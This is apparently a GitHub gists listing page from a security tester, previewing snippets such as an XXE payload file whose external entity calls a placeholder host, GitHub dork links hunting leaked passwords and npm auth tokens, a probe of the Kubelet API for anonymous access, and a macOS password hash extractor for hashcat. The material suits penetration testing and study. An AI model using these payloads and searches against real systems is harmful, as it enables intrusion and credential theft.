View README.md
Git
Global Settings
- Related Setup: https://gist.github.com/hofmannsven/6814278
- Related Pro Tips: https://ochronus.com/git-tips-from-the-trenches/
- Interactive Beginners Tutorial: http://try.github.io/
- Git Cheatsheet by GitHub: https://services.github.com/on-demand/downloads/github-git-cheat-sheet/
Reminder
Press minus + shift + s
and return
to chop/fold long lines!
View kubelet-api.md
Accessing Kubelet API
curl -sk https://localhost:10250/pods/
- If
--anonymous-auth
is turned off, you will see a401 Unauthorized
response. - If
--anonymous-auth
istrue
and--authorization-mode
isWebhook
you'll see403 Forbidden
response with messageForbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
- If
--anonymous-auth
istrue
and--authorization-mode
isAlwaysAllow
you'll see a list of pods.
View jenkins-api.md
jobs
jenkins_url
+ /api/json?tree=jobs[name,color]
builds
jenkins_url
+ /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]
last build
View Github bash generated search links (from hunter.sh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "" | |
echo "************ Github Dork Links (must be logged in) *******************" | |
echo "" | |
echo " password" | |
echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
echo "" | |
echo " npmrc _auth" |
View XXE_payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
View osx_extract_hash.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Mac OSX Catalina User Password Hash Extractor | |
Extracts a user's password hash as a hashcat-compatible string. | |
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
format, so previously reported methods for extracting the hash don't work. |
View Security Engineer - Interview Questions.md
Core Information Security
-
What is information security and how is it achieved?
-
What are the core principles of information security?
-
What is the CIA triangle?
-
What is non-repudiation (as it applies to IT security)?
View list_gcp_iprange.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# https://cloud.google.com/compute/docs/faq#find_ip_range | |
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8 | |
myarray=() | |
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :` | |
do | |
myarray+=($LINE) | |
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :` |
NewerOlder